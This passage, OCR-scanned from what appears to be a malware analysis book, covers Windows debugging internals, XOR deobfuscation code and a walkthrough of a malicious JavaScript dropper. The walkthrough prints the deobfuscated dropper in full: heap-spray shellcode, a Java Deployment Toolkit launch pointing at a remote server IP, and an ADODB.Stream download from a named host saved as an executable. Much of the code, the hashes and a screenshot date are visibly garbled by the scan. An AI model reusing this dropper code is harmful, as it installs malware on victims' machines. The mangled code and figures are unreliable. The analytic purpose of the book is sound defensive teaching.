types - hardware exceptions (processor 
interrupts) and software exceptions 
(RaiseException Win32 API). When exceptions 
occur, the debugger is notified via the debug 
events by the OS exception handling code in the 
user mode module ntdll.dll. 


The debugger is given two chances to handle the 
exception. The debugger monitors the first 
chance notification and provides a choice to pass 
the exception back to the debuggee to handle. 
At the second chance notification, the debugger 
halts and breaks in the code. 





> 


Continue Debugging 








2nd Chance notification 
ist Chance notification 





Vv » 


Single stepping through the code is enabled via 
the trap flag (TF) Int 1 CPU instruction in the 
EFLAGS register, and software breakpoints are 
implemented by the debugger using Int 3 (OxCC 
opcode) instruction which is written to the 
process memory using WriteProcessMemory and 
ReadProcessMemory API calls to manage them 
transparently from the debugee. 








A debugger implementation 
overview 


The debugger runs in an infinite loop, waiting 
and processing the debug events, which are OS 
implementation specific. Once the process 
handle of the debugee is obtained using 
CreateProcess or OpenProcess, 
WaitForDebugEvent monitors the debug events 


passed in a system object and filters them using 
event codes in a switch case like filter. Thereafter, 
ContinueDebugEvent proceeds to resume the 
debugger operation. 


Following are the basic debugger functions used 
by implementing a few essential Win32 APIs 
provided by Windows: 


« OpenProcess 


HANDLE WINAPI OpenProcess( 
_In_ DWORD dwDesiredAccess, 
_In_ BOOL bInheritHandle, 
_In_ DWORD dwProcessId 

; 


« CreateProcess 


BOOL WINAPI CreateProcess( 
_In_opt_ —_ LPCTSTR 
LpApplicationName, 
_Inout_opt_ LPTSTR 
LpCommandL ine, 
_In_opt_ 
LPSECURITY_ATTRIBUTES 
lpProcessAttributes, 
_In_opt_ 
LPSECURITY_ATTRIBUTES 
LpThreadAttributes, 
Th BOOL 
bInheritHandles, 
_In_ DWORD 
dwCreationF lags, 
_In_opt_ LPVOID 
LpEnvironment, 
_In_opt_ —_ LPCTSTR 
LpCurrentDirectory, 
ENS LPSTARTUPINFO 
LpStartupInfo, 
_Out_ 
LPPROCESS_ INFORMATION 
LpProcessInformation 
); 


- DebugActiveProcess 


BOOL WINAPI DebugActiveProcess( 
_In_ DWORD dwProcessId 
); 


- DebugActiveProcessStop 


BOOL WINAPI 
DebugActiveProcessStop( 

_In_ DWORD dwProcessId 
; 


- DebugBreakProcess 


BOOL WINAPI DebugBreakProcess( 
_In_ HANDLE Process 
); 


- WaitforDebugEvent 


BOOL WINAPI WaitF orDebugEvent( 
_Out_ LPDEBUG_EVENT 
LpDebugEvent, 
_In_ DWORD 
dwMilliseconds 
); 


- ContinueDebugEvent 


BOOL WINAPI ContinueDebugEvent( 
_In_ DWORD dwProcessId, 
_In_ DWORD dwThreadId, 
_In_ DWORD dwContinueStatus 
; 


- WriteProcessMemory 


BOOL WINAPI WriteProcessMemory( 
_In_ HANDLE hProcess, 
_In_ LPVOID lUpBaseAddress, 
_In__ LPCVOID lUpBuffer, 
_In_ SIZE_T nSize, 
_Out_ SIZE T 

*LpNumber0Of BytesWritten 

); 


- ReadProcessMemory 


BOOL WINAPI ReadProcessMemory( 
_In_ HANDLE hProcess, 
_In__ LPCVOID lpBaseAddress, 
_Out_ LPVOID lpBuffer, 
_In_ SIZE_T nSize, 

_Out_ SIZE_T 

*LpNumber Of BytesRead 

); 


Examine symbols 


To examine symbol information and find out API 
names and other information, you can use the x 
command. In the following excerpt, we search for 
all kernel APIs (Symbols) containing the Zw prefix. 
The * wildcard character means that it searches 
for names that contain Zw anywhere in the name 
string. 


x nt! *Zw* 





In the kernel mode, you can set a system wide 
breakpoint at bp nt!ZwCreateFile and all calls 
to this API, regardless of the process, will break at 
this API. 


You can search for "Debug" and "Process" related 
APIs in kernel32.dl1l, which exports them as 
shown in the next image. 


Examine symbols or x, which also takes the * 
wildcard character that can be used for symbol 
searching. 





As an exercise, do lookup the following 
commands in the help system and try to 
understand how they might work: 


e !pool: This is for showing memory pools 
e .exr: This is for showing exception information 


e .frame: This is for showing stack frames 


Objects 


You can use Winobj from Sysinternals to learn 
more about the objects available in your current 
subsystem. 


ObjectTypes lists the kernel objects and their 
types and many of them exposed to user mode 
via handles. Many of the objects are 
undocumented and others are only accessible 
from the kernel mode. 


File View Help 





4: a \ 
(jl ArcName 
p a) BaseNamedObjects 
= Callback 
a Device 


a ObjectTypes 
oJ) RPC Control 
>- Sandbox 
~ Security 
4 s-J Sessions 
i “a 0 
oo AppContainerNan 
> DosDevices 
4: a 1 
dl AppContainerNan 
> BaseNamedObjec | 


1 em... 
> 


\ObjectTypes\Process 








Name / 

Ko) EtwRegistration 

©) Event 

o EventPair 

Oh File 

a FilterCommunication... 
©) FilterConnectionPort 
©4loCompletion 

oO loCompletionReserve 
OAIRTimer 

OhJob 

‘Oh Key 

©) KeyedEvent 

Q Mutant 

©) PcwObject 

©) PowerRequest 

Ky Process 

oO Profile 

oO Section 

©) Semaphore 

oO Session 

©) SymbolicLink 

< 





Note the process and mutant (mutex) object 
types. The job object is also important as are 
groups processes. Semaphores are similar to 
mutants (used as a synchronization mechanism - 
for instance, a process can check if another 
process instance of the same file image is 
created) with a count. SymbolicLinks are used 
throughout the system. For instance, the drive 
names (C:\) are exposed as symbolic links. 


bf FleSystem PBitocker 


4 GLOBAL 


\Device\BitLocker 
\Device\HarddiskVolumed 
\Device\CdRomd 


SymbolicLink 
SymbolicLink 





SymbolicLink 


You will find that many Windows APIs reveal or 
work on many of these objects - OpenProcess 
and CreateProcess work expose the process 
objects, CreateThread and OpenThread expose 
the thread objects, CreateMutexA and OpenMutex 
expose the mutants, and CreateSemaphore and 
OpenSemaphore expose the semaphore objects. 
You must have noticed a kind of pattern - 
Create*** and Open*** prefixed APIs might just 
work on a particular object and you can get the 
name of the type from the postfix string! Double 
check it with WinObj and Windbg. 


In IDA Pro/Windbg, set the current process to 
explorer.exe, use .process -1 0 to record the 
process object address, and type !object 
824095f8, replacing the EPROCESS address in 
the kernel space of the process with the one in 
your system. 





You can then examine the object header using 
the display type or the dt command, as shown 
next: 


dt nt! OBJECT_HEADER 824095e0 





You can then probe further and look into the 
object type, taking the address as a parameter: 


dt nt! OBJECT TYPE 829c8e70 





Name field as UNICODE STRING "Process". An 
interesting thing to note is that the 
TotalNumber0fObjects field is 0x13 at the time 
of running the command. Converting it to 
decimal using .formats 13 or? 13, you can 
deduce that the total number of process objects 
or processes running in the system is 19. 


At this point, some excellent references to this 
introductory primer to kernel based debugging 
merit mention, as this is a more involved topic 
that must be explored in more depth. The first 
obvious choice for many is to study C:\Program 
Files (x86)\Debugging Tools for Windows 
(x86) \kKernel_ debugging tutorial.doc, 
installed along with the DDK packages, along 
with the reference help file debugger. chm 
accessible through the .hh command. The 
following are some other worthy references: 


e Inside Windows Debugging, Tarik Soulami, Microsoft Press 
US 
e« Windows Internals, Mark Russinovich, Dreamtech Press 


e Gray Hat Python, Justin Seitz, O'Reilly 





Summary 


In this chapter, you gained an understanding of 
the steps involved in unpacking and re-building 
packed binaries. You also learnt how to configure 
IDA Pro for kernel debugging, involving tools 
such as VMWare and VirtualKD. You learnt how to 
use the various Windbg commands and utilize 
them towards gleaning information from the 
target. You delved into the debugger 
mechanisms in Windows and looked at how the 
debugger features are implemented. You also 
browsed over essential Windows internals 
concepts, such as SEH, call gates, SYSENTER, 
interrupts various APls. You started with 
computing foundations, C programming and 
reversing fundamentals, assembly programming 
using VC++ and MAS32, a comprehensive look 
at the malware analysts’ toolkit, and an in-depth 
malware analysis session of a real world malware. 
At this point, you have all the foundations 
required to explore malware analysis on your 
own, in both the user land and the kernel land. 


In the next chapter, we will go over some 
commonly found malware vectors such as flash 
files, pdf and MSOffice file, and obfuscated 
scripts. We will learn how to analyze them with 
the available tools. 


Chapter 5. Good 
versus Evil - Ogre 
Wars 


In this chapter, we will cover the following topics: 


e Linux configuration for network traffic analysis 
e« Xor DeObfuscation 

e Malicious web script analysis 

- Bytecode decompilers 

e Document analysis 

- Redline-Malware memory forensics 


e« Malware intelligence 


The battle never ends, and fighting malware is 
like trying to kill a multi-headed Hydra. The tools 
are dual-natured and both offense and defence 
keep progressing, and the methods keep getting 
innovated. Also, few features keep recurring: 


- Regression: Repeating an old attack to the uninitiated or 
unprepared is like catching the enemy unawares, and 
hence is an effective technique. 


- Redundancy: As in the case of using NOP sleds in 
shellcode is like buying insurance and ensures that the 
probability of success is increased manifold. 


e« Mutation: Polymorphism is the most effective and 
widespread technique as of now. If you can't see it, you 
can't find it. Even being diverse and distributed is a form 
of mutation, as the threat landscape is dynamic and the 
key actors are difficult to pinpoint. It is both everywhere 
and nowhere. 


- Deception: If you look at this method, in essence, it is 
older than humankind: from the proverbial bite of an 
apple to the most recent spear phishing attacks via email 
and infected PDF files. The overall method is as classic 
and effective as can be. The primary effects that the 
malicious agents make use of are analogous to timeless 
Evil - remaining undetected, spreading decelerated or 
expedited destruction, creating confusion, and making 
use of weaknesses in the target system either as 


vulnerabilities or targeted exploits. Earlier, it was a sport 
or a hobby, but it has now transformed into organized 
crime. It is in your best interest to be aware of other 
miscellaneous techniques that can aid you in your fight 
against ill-intentioned software. 


Wiretapping Linux for 
network traffic 
analysis 


A Linux box running on VMWare can be used for 
network capture and as a DNS server ora 
simulated internet. To achieve this, we can use 
the host-only networking mode set on all the 
participating guests with a Windows XP SP2 
guest and a *nix guest to a bare minimum. You 
set it to Vmnetl1 (host only) default network and 
the VMware DHCP service assigns IP addresses to 
each of them. You ping the Linux guest from the 
Windows guest to confirm that you are 
connected. Then disable the Windows firewall 
and try to ping the Windows guest from Linux. 
Since you will be using the Windows XP guest as 
the analysis OS and Linux for network analysis 
mainly, you will have to set the default gateway 
parameter as well as the preferred DNS server 
manually in the Windows guest to the IP address 
of the Linux guest. The IP addresses can be 
different on your setup. Now, all the traffic will be 
routed to the Linux box where you can run 
Wireshark and study the packet captures. 


Internet Protocol (TCP/IP) Properties 


aE 
General 





‘You can get IP settings assigned automatically if your network supports 
this capability. Otherwise, you need to ask your network administrator for 
the appropriate IP settings. 


© Obtain an IP address automatically 
©) Use the following IP address: 


IP address: / 192. 168. 138 








Subnet mask: 255 . 255 . 255 . 





Default gateway: 138 1 68 . 138 





Obtain DNS server address automatically 
©@) Use the following DNS server addresses: 
Preferred DNS server: 198 . 168 . 


Alternate DNS server: 











Many times, you will extract the host names used 
by the malware from the sample and you will 
want to simulate a real connection to further 
analyze the malware in a more authentic manner. 
In Windows, spoofing the DNS queries can be 
done in various ways, with the simplest one 
being the use of the hosts file in the Windows XP 
directory 
(Windows/system32/drivers/etc/hosts). You 
can edit the file and make a list of the host 
names that map to your specified IP address, 
which you will put as the IP address of the Linux 
guest. While saving the file, remember to check 
that the notepad did not add the .txt extension 
to the host file, which has no extension. 





# Copyright (¢) 1993-1999 Microsoft Corp. 

it 

# This is a sample HOSTS file used by Microsoft TCP/IP for windows. 
i# 


# This file contains the maps of IP addresses to host names, Each 

it a should be kept on an individual line. The IP address should 

# be placed in the first column followed Y the corresponding host name, 
# The IP address and the host name should be separated by at least one 
# Space, 


it 
i# rede / comments (such as these) may be inserted on individual 
# lines or following the machine name denoted by a '#' symbol, 


it 

# For example: 

it 

i# 102. 54,94, 97 rhino, acme, com # source server 
i# 38,25,63.10 x, acme, COM # x client host 
127.0.0.1 localhost 


198.168.138.131 malwaresitedanger. com 








FakeNet, which we briefly mentioned in Chapter 
3, Performing a Séance Session, is another 
excellent tool for simulating a DNS and HTTP 
(and SSL) server and capturing all responses and 
requests to a specific IP address. The HTTP server 
also simulates the files returned when requested; 
for instance, the .JPG files. The file returned is 
user configurable. Explore the FakeNet.cfg 
config file for a host of other options. FakeNet 
runs on Windows as a portable installation and 
negates the need to have a separate Linux guest 
for network analysis. However, for a more 
elaborate arrangement, you should know what 
your options are. 





For simpler server simulation and data capture, 
you can use NetCat, setting the port to listen to 
as: 


nc —l -p 80 


InetSim is another Linux tool which can be used 
for malware analysis. It simulates a host of 
services such as IRC, HTTP, DNS, and so on to try 
to fully emulate the internet. 


Encoding/decoding - 
XOR Deobfuscation 


You will come across the XOR Boolean operation 
being used for initialization of variables as xor 
eax,eax or aS an elementary obfuscation device. 
In the following simple C code, you can trace 
through sample XORing de-obfuscation of an 
ASCII string with a single static key and a 
dynamic key. You can also make use of string 
matches and brute-forcing (static key in this 
sample, you can easily replace it or embellish it 
with the dynamic key using one line of code, try 
it) function to get an idea as to how it may be 
used by malware. Use the locals window in VC++ 
to check the variable values within the loop and 
function scopes: 


#include "stdafx.h" 
#include <conio.h> 
#include <string.h> 
#include <stdio.h> 
#include <stdlib.h> 
#include <math.h> 


void dynaXor(char *p, int key){ 
int l=strlen(p); 
ROG (ane al HOS ae ay) fi 


printf ("%c",p[i]*key); 
key+=1; //the key is incremented 
for every subsequent byte xor 


- 
ro ge 9 gk Goat Wa hae 


} 
void xor(char *p, int key){ 
int l=strlen(p); 


hor (ant © 02 gels i+) { 


printf ("%c",p[i]*key); //key is 
static 


} 
print (Vne 


void bruteForcer(char *p, char 
*matchString, int fourByteMode) { 


int length = strlen(p); 

int matchLength=strlen(matchString) ; 

int exitFlag=0; 

unsigned int xorLength=256; //default 
length of 1 byte xor 


if (fourByteMode == 1) { //increases 
the xor key range to (2%32-1) 


xorLength=UINT MAX-1; 
} 


for(int i=0; i < xorLength ; i++) { 


if (exitFlag==1) { 
break; 

} 

int counter =0; 

int hitIndex=0; 


fe 

#pragma region conditional breakpoint 
emulation 

//since we already know the sample key in 
code 0x22, which gets stores in EAX (use 
the disassembly window and registers view 
in VC++ 2008 Express Edition as discussed 
in earlier chapters), you can set a 
conditional breakpoint using the int 3 
assembly mnemonic. Uncomment for use and 
replace with key of your choice. 


_asm{ 
cmp eax,0x22 
jne normal 
int. 3 
normal: 
nop 


} 
#pragma endregion 
ae 


for (int j =0; j < length; j++) { 
printe( se", pli" 4); 


//If there is no match string then it 
just bruteforces all the values and 
//displays them in standard output 
//else it looks for a continuous match 
for every first hit of the match string 
and the subsequent characters, and quits 
if a match is successfully found. 


if (matchString!=""){ 
char temp=p[j]*i; 
if ((int) (matchString[counter] )== 
(int) (p[j]*i) && (j-hitIndex) < 
matchLength ){ 
if (counter == 0) { 
hitIndex=j; 
} 
if (counter == (length-1) & 
matchString!="") { 
printf(" : match is true at key 
Ox ay ys 


exitFlag=1; break; 


af 
counter++; 
} else { 
counter=0; 
- 
i 
- 
prantt(7\n") 4 
} 
} 


int tmain(int argc, _TCHAR* argv[]) 
{ 


char * pl = (char 
*)malloc(strlen("@MLHMWP") ) ; 

strcpy(p1,"@MLHMWP") ; //pre- 
xored obfuscated string 


char * p2 = (char 
*)malloc(strlen("@LJOIRZ")); 
strcpy(p2,"@LJOIRZ"); 


printf("Xor de-obfuscation for %s with 
key 0x22: ",pl); 
xor (pl, 0x22); 


printf ("Dynamic xor de-obfuscation for 


%S with key 0x22: ",p2); 
dynaXor(p2,0x22); 


bruteForcer(p1,"bonjour",0); //use 1 
as 3rd parameter for 4 byte xor 


getche(); 
return 0; 








For malware research and xor deobfuscation of 
malware codes, and detection of strings that may 
be initially obfuscated in the static file image, 
XORSearch and XORStrings are two pre-fabricated 
command line and open source tools available at 


http://blog.didierstevens.com/programs/xorsearc 
h/. 


They both have additional modes for ROL, ROT, 
and SHIFT as well. You supply the mode type, the 
key, and the file to work on. 


To de-obfuscate the memory regions (code/data), 
you can: 


e Let the malware decrypt/deobfuscate itself inside a 
debugger, then halt the debugger and proceed with 
analysis thereafter. As mentioned earlier, the OLlyDump 
plugin in OllyDbg or the Debugger | Take memory 
snapshot feature in IDA Pro will be very useful during 
dynamic analysis. 


e Utilize a scripted disassemble/debugger to write 
customized scripts using their inbuilt languages, such as 
IDC for IDA Pro and Python for Immunity Debugger. This 
method can be useful even in the case where the 
malware cannot be executed if it is corrupted or partially 
unpacked. 


« Copy the regions from the debugger into a C character 
array and proceed with programmatic de-obfuscation of 
the regions by feeding the array into a loop with the 
decrypting logic implemented accordingly. In OllyDbg, you 
can use right-click Binary | Binary Copy to get the 
spaced textual representation of the hexadecimal 





codes/data. 
Backup » 
Copy > 
Binary » Edit Ctrl+E 
Assemble Space Fill with 00's 
Label : Fill with NOPs 
one Binary copy 











Malicious Web Script 
Analysis 


Malicious web scripts are somewhat different 
beasts to binary malware. While the analyzing 
approach is quite similar to binary malwares, the 
tools are a little different. Firebug is a web 
development and testing tool that will function 
as a generic debugger for our purposes. 


e https://github.com/firebug/firebug 
e http://getfirebug.com/ 


The feature set of Firebug from the official site: 


Inspect HTML and modify style and layout in realtime 


- Use the most advanced Javascript debugger available for 
any browser 


Accurately analyze network usage and performance 


e Extend Firebug and add features to make Firebug even 
more powerful 


e Get the information you need to get it done with Firebug 
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In the preceding image, you can see that the 
Script tab is what interests us most for this 
particular session. The leftmost pane is line 
numbered and the red balls are breakpoints. You 
can right-click it to open a conditional breakpoint 
dialog for evaluating the expressions. The entire 
set of scripts of the current loaded page is color 
coded and beautified for debugger display. The 
right-hand side pane consists of the Watch tab, 
which displays the variables and objects along 
with their values. The Stack tab is activated once 


you have broken inside the debugger so that you 
can analyze the call sequence of the functions 
from the script. Breakpoints list out the currently 
active breakpoints. The Continue (F8) button is 
present in the familiar VCR-like controls along 
with Step Into (F11) and Step Over (F10). This 
should be familiar by now after the introduction 
in the earlier chapters, and they work exactly as 
expected. Much of our analysis will be done in 
Firebug. 


The other tools we will use later on are Malzilla 
(http ://malzilla.sourceforge.net/) and any hex- 
editor of your choice. From the official site - 
"Explore malicious webpages and view their code 
with Mailzilla". 


The target malicious script is taken randomly 
from the various malware repositories. 


Taking apart JS/Dropper 


The sample MD5 hash: 
8d9d57498751le79ac9efd89ccIecc81Ff 


A quick https://www.virustotal.com/ search 
reveals that this was first analyzed nearly 5 years 
back with only 1 out of 43 vendors detecting it. 
But as we Shall see, the file is malicious and this 
lack of better detection, even when the file is 
available, is a sign that the anti-virus 
technologies have not yet evolved parallel to the 
evolution of malware. This might not be an ITW 
(in the wild) threat as of now, but the 
technologies employed in this script are very 
much alive and working, which makes it a point 
to ponder. 





SHAZSS: ——‘ScdoafeDSOSctRadbela2SGOdadD746Hb2%ctDc76736777Tadbad4’4 


Detection ratio: 1/43 





Analysis date: 2040-14-01 O7 34-01 UTC (4 yeas, 7 months ago 


EAnaysis Additonal information porns Votes 


Antivirus Result Update 








Nb {Dropper 20g 


This website as an HTML/Javascript document is 
an obfuscated web document utilizing the 
obfuscated Javascript embedded as a ciphertext 


and decoded using another obfuscated interface, 
the primary script. It de-obfuscates the ciphertext 
in memory and executes the resulting Javascript, 
which is full of payloads. It also utilizes the 
recently discovered CVE-HCP vulnerability/exploit 
along with the locally installed shellcode (using 
ADOStream object methods for binary data 
transfer over RDS), which mimics the malicious 
activity of the decrypted scripts. iFrames and 
Java plugin tags are used to execute multiple 
document objects and load malicious payloads. It 
is selective in its payload sequence based on the 
OS version and the installation of MSIE or Firefox. 


Preliminary dumping and 
analysis 


| try to run the web page in IE6 with VS 2008 
debugger configured to be activated as the JIT 
debugger, which can be set in the following 
registry keys: 


e HKEY LOCAL MACHINE\SOFTWARE\Microsoft\WindowsNT 
\CurrentVersion\AeDebug\Debugger 


e HKEY LOCAL MACHINE\SOFTWARE\Microsoft\ .NETFrame 
work\DbgManagedDebugger 


Or set the default debugger when an exception 
occurs in the JIT debugger dialog box or via 
Options | Debugging | Just-In-Time | Enable 
Just-In-Time debugging of these types of code: 
Managed/Native/Script. 


On JIT debug, VS 2008 Debugger displays the 
following: 





HTML (SS | Script | Profiler 
ha 0 ll (a (3 1&5 |S Dtugjng| [spn thin ’ 


9) var allJf; 

250 f(D |=" 88 aM |= ‘oil’ {aH = ‘nth’ 
351 if (vUloghifkynkV6] != "'){var yndFs 

352 Af(ynF |= ‘hSHy' && yndF != ‘ucOA5'}{yn2F = "hSty'}s 
353 this ward = "word": ULogh{kynkV6] = £43Hu(obKT (vUogh[kynKV6]), "YcfB1d8026a901805 2c"); 
354 var KS 

255 if ((Sdd != "WRolyn’ 88 Kd f= “deol {ASdd = “ARCA\n'} 
356} 

357 this.izlbQY = "'; 

358 var x55Q0; 

359 4f(x65QQ != ‘rARBP" 88 x58Q) != '") 

360 {155Q) = null}; 

361 kynkVGe4s 

362 var wikfs 

363 if (wt != "yyllk' {ik = “yyllk'}: 

364 var wrZS00; 

365 {f(ZS00 |= "* 88 we t= "Hil {un20 = "VEN" 
366 var kal = new Inage(); 

367 var 2HbbAD = pkv(DB[laxéx](","); 

368 var tuiK8 = 1B; 

369 var yxkcs 

370 if(yxde = ‘eBoo' 8B yxkc 1= "TRIB" ){yxdc = 'eBoo' 
371 var (80); 











This continues in the following image: 





372 if(qG8Dj != '* && qG8Dj != ‘ppuR"){qo8Dj = *"}; 
373 var cT5w = 1; 

374 var sPAr = 24803; 

375 this.tkMT9 = false; 

376 while(cTSw < zHbb4D.length){var zZx1; 

377 if(zZxl != '* @& zZxl != ‘uZBODR'){zZx1 = **}; 
378 van gtyKsif(etyk != ''}etyk = ‘wExAlM’}; 

379 uAYMnQ += String[ xULogh[2]](zHbb4D[ cT5w]); 

380 var a(5Yf = ""; 

381 var q/TRt; 

382 if(q/TRt I= "' 8& q/TRt != ‘c4BR'){q7TRt = **}; 
383 cTSwet;var ejSD; 

384 if(ejSD != ‘yP9FD' && ejSD != ‘rmDAE"){e]SD = **}; 
385 var hoCVWv; 

386 if(hOCW I= “holldC* 8& HOC != ‘fGKYA’}{HOCW = **}; 
387 } 

388 var zKX41; 

389 if(zKXAL I= ** 8& 2KXA1 != ‘cvFdF*){zKX41 = null}; 
390 

391 var h(Cso; 


392 Af(hCCso l= "* 8& hCCso != ‘huCg'){hCCso = ‘gpXr'}; 
&) 393 var i6Vaw = new Image(); ; 


394 this .yGXwVZ = ''; 

395 var tHLiv; 

396 if(tHLHv != ''){tHLHv = 'mIgge'}; 
397 var vAWyr; 

398 if(vAllyr != ‘wqzB' && vAllyr I= '') 
399 {vAllyr = null};< 








It stops at line 393, so it seems there is an 
exception which causes the JIT debugger to catch 
it. At this point, you can try to gauge where the 
script is currently. Let us check a few of the 
variables and search for the change in content. 
You can restart the debugger in Firebug, seta 
breakpoint, and compare the states. 


The following is the original cipher text: 
Fave 'EVIWChOVCQceBLAIHAcEHAQOVRGIVIMUEFULHANHLRUDAKBRQEPB QPRSKAXBQICK... Sing 


The following is the decryption in progress: 





q pkvCO8 “102,117 12099 116 10611, 110,32 102112, 118,98 95,95 95,10,40, 11261, 104,95, 165. Sting 





The partially decrypted text can be dumped by 
copying the field from the debugger and pasting 
it in any text editor of your choice, for better 
visual analysis. 





Till you hit the jackpot and you find a large 
textual value being decrypted in a memory 
variable, you will notice that the debugger 
becomes a bit un-responsive and the application 
lags a little (meaning that it's working hard). 





Ain “incon fovb__d(eQh P_}iffavigatr uerdgenttoLowerCase()ncevOf(ghP.) » 1, Sting 





Copying the contents of this variable from the 
debugger, we get a rather lengthy and 
obfuscated dump: 


function fpvb__d(pQh iP ){ 

if 

(navigator.userAgent .toLowerCase() .index0 
‘(poh AP = yf 

return 1; 

} 

return 0; 

li 

function J_ TOgwzJ(N_ABHu_){ 

try { 

var obj = new ActiveXObject(N ABHu ); 
if (obj){ 

return true; 


} 


} 

catch (e){ 

return false; 

} 

ii 

function GbWxB60() { 

var x ETUSp = [0,65 0)3 

if (fpvb  d("msie")){ 

Enya 

var uDZJnWN = new 

Activex0bject(' ShockwaveFlash. ShockwaveFl 
ash' ).GetVariable( 

‘'$version' ); 

uDZJnWN = uDZJnWN.split(","); 
X_LIUSp[0] = uDZJnWN[0].replace(/\D/g, 
aR 

X LIUSp[1] = uDZJnWN[1].replace(/\D/g, 
sale 

X LIUSp[2] = uDZJnWN[2].replace(/\D/g, 
ihe 

} 

catch (e){ 

} 

} 

else { 

try { 

var zb pFze_ = 

navigator.plugins[ "Shockwave 
Flash"].description. replace ( 

(A a- ZAC ZAIN Sick7 

"") replace(/(\str| \stb[0-9]+)/, 

ee Meese as 

X LIUSp[0] = zb pFze [0].replace(/\D/g, 
ae 

X LIUSp[1] = zb pFze [1].replace(/\D/g, 
als 

X LIUSp[2] = zb pFze [2].replace(/\D/g, 
matte 

} 

catch (e){ 

} 

} 

return A LIUSp; 

} 

function bVT_ X(){ 

var ooOBS = Q; 

if (fpvb  d("msie")){ 

try { 


if (J _TOgwzJ(' AcroPDF.PDF' ) | | 
J_TOgwzj(' PDF.PdfCtrl' )){ 
ooOBS = 1; 
tf 
} 


catch (e){ 

is 

} 

else { 

try 4 

for (FIoUR = 0; FIOUR_ < 
navigator.plugins.length; FIoUR_ ++ ){ 
op 

(navigator.plugins[FIoUR  ].description.i 
ndexOf(' Adobe Acrobat' ) > - 1 || 
navigator.plugins[FIoUR_].description.in 
dexOf(' Adobe PDF' ) > - 1){ 

ooO0BS =1; 

} 

} 

in 

catch (e){ 

i 

} 

return ooOBS ; 

} 

function qIvol (TXmYmzL) { 

var A WL8- = 
document.createElement(' iframe’ ); 

A WL8 _.setAttribute(' src’ , TXmYmzL); 

A WL8 __.setAttribute(' width’ , 200); 

A WL8_.setAttribute(' height’ , 200); 
document.body.appendChild(A WL8_); 
return ; 

} 

function a_ AK6 (){ 

var Yf7Dp ; 

var agTK O = unescape(' %uQ808%uU0808' ) ; 
var U Cz 0 = 
unescape("%Su9c60%uUeCc81%U0200%U0000%UN0e8B% 
u0000%u5d00%uUCc581%u011a%sUu0000%uCc031%uU8b64 
%U1840%U408b%u8b30%U0Cc40%u7 88d%u8b1c%u8b3 
%uU2077%ud231%u05eb%uCc2c1%Uu3007%U66C2%uU24 
ad%u75df%u81f5%ubc f2%u5367%u756 fsu8be4%ud 
85 f%u758d%ue800%U007e%u0000%uUe7 89%U758d%u 
e814%u00c8%u0000%uUF F57%U0055%uUCc389%uU758d% 
ue80c%uU0066%U0000%uU758d%ue820%U00b2%uU0000 
%UCQ31%uUCc983%uF2 f Fsu4 fae%sue389%uU758d%ue83 
a%u00a0%U0000%uCc031%U0738%uU3d74%uU5746%ubC 
8d%u0024%U0001%uU8900%U5007%U6850%uU0100%uU0 
000%u5357%uf f50%u0c55%uc009%ule75%u488d%u 
2954%u57cf%uaa ft 3%u578d%uc7bc%u4402%uU0000% 
u5200%u5050%u206a%uU5050%u5050%u Ff f57%uU0455 
%ueb5 F>u81b8%u00c4%u0002%u9d00%uCc361%ueb5 
%Ue808%U000a%U0000%U4689%Uad fF C%UCOO9%UT3 
75%uUCc35e%uU5 756%UC189%U438b%uU8b3Cc%U037 c%uU0 
178%u8bd f%u2077%udeO 1%uad56%ud801%ud231%u 
€2¢1%U3207%uU4010%uU3880%uU7500%uU31F5%uU75ca% 
u58ec%uc629%ueed 1%u7 703%u0 f24%uU44b7%uFe33 


%ueOc1%U0302%u1Cc47%U048b%U0103%uU5 fd8%uc35 
e%u8a57%U4606%uU0632%u7 5aa%u5 f fa%u26c3%uUaCc 
80%uc7c8%uU318a%U0046%uU0000%U2900%uCcc1b%sud 
02 f%u0000%ub f00%U07ea%u01le%sUu0102%uU6a60%u 
0008%u8b4c%ulce3%u0400%uU154a%u5 fO0%uU1d1f% 
u@11c%u465d%ul f 1b%u5a5e%u441F%u0058%u5800 
%u912 f%u03fd%su050e%u5e4a 

%U1818%U594 f%u0c5b%uU4317%uU0 f58%ue7 32%U038 
%uU050e%u5e4a%U1818%uU5 94 F%suUd f5b%u4314%u0 Ff 
58%uf532%u0399%u050e%U5e4a%U1818%U594 F%sud 
e5b%u4315%u0 f58%udb32%u00db" ) ; 

while (agTK_0.length <= 0x10000 / 
2)agTK_O += agTK 0; 

agTK_0 = agTK_0.substring(0, 0x10000 / 2 
= W267 0 Length): 

Yf7Dp_ = new Array(); 

for (FIoUR = 0; FIOUR_ < 0x1200; 
FIoOUR_ ++ ){ 

Yf7Dp [FIoUR_ ] = agMhK 0+ U Cz0O; 

} 

ih 

function M_inUa(){ 

try { 

var XeF GKd = 

"http: -J-jar - 
J\\\\194.8.251.214\\public\\273928cb4859a 
Odb86ba8aefd34c1755.doc none"; 

if (fpvb  d("msie")){ 

try 

var tdeDCU = 
document.createElement(' OBJECT' ); 
tdeDCU.classid = ' clsid:CAFEEFAC-DEC7- 
0000 -0000-ABCDEFFEDCBA' ; 

tdeDCU. Launch(XeF_ GKd); 

} 

catch (e){ 

var hJRvBR = 
document.createElement(' OBJECT' ); 
hJIRvBR.classid = ' clsid:8AD9C840-044E- 
11D1-B3E9-00805F499D93' ; 

hIRVBR. Launch(XeF GKd) ; 

ty 

} 

else { 

var tdeDCU = 
document.createElement(' OBJECT' ); 

var qYnp_u_ = 
document.createElement(' OBJECT' ); 
tdeDCU.type = ' application/npruntime- 
scriptable-plugin;deploymenttoolkit' ; 
qYnp_u_.type = ' application/java- 
deployment-toolkit' ; 
document.body.appendChild(tdeDCu) ; 
document .body.appendChild(qYnp u_); 


thy <£ 
tdeDCU. Launch(XeF_ GKd); 


} 

catch (e){ 
qYnp_u_.launch(XeF GKd); 

} 

} 

in 

catch (e){ 

is 

} 

function d7cey (){ 

var kj7_hPfx =' .//..//AA_LWO.exe' ; 
var FTwlo R =' responseBody' ; 
var ThP_ G = 


document.createElement(' object' ); 
The: (1G. SetAttributet ad | * ThP 1G") 
ThP_ G.setAttribute(' classid' , 

' clsid:BD96C556 -65A3-11D0-983A- 
00CO4FC29E36' ); 


try { 

var GR_kNSi = ThP_ G[' CreateObject' ] 
ms xm 2s San tate po ee 

var tu_WWO = ThP_ G[' CreateObject’ ] 
( shell.application' , “")% 

var zSTe_ T = ThP_ G[' CreateObject' ] 
(‘adodb.stream , ""); 

try 4 


zSTe_T[' type’ ] = 1; 
GR_kNSi[' open’ ]('GET' , 
'http://porno2top. tk/www/load. php? 
f=1&e=4' , false); 
GR_kNSi[' send' ](); 
zsTe. Tl apen’ J)¢ 

zSTe__T['write’ ](GR_kNSi[FTwlo R]); 
zSTe__T[' savetofile’ ](kj7_hPfx, 2); 
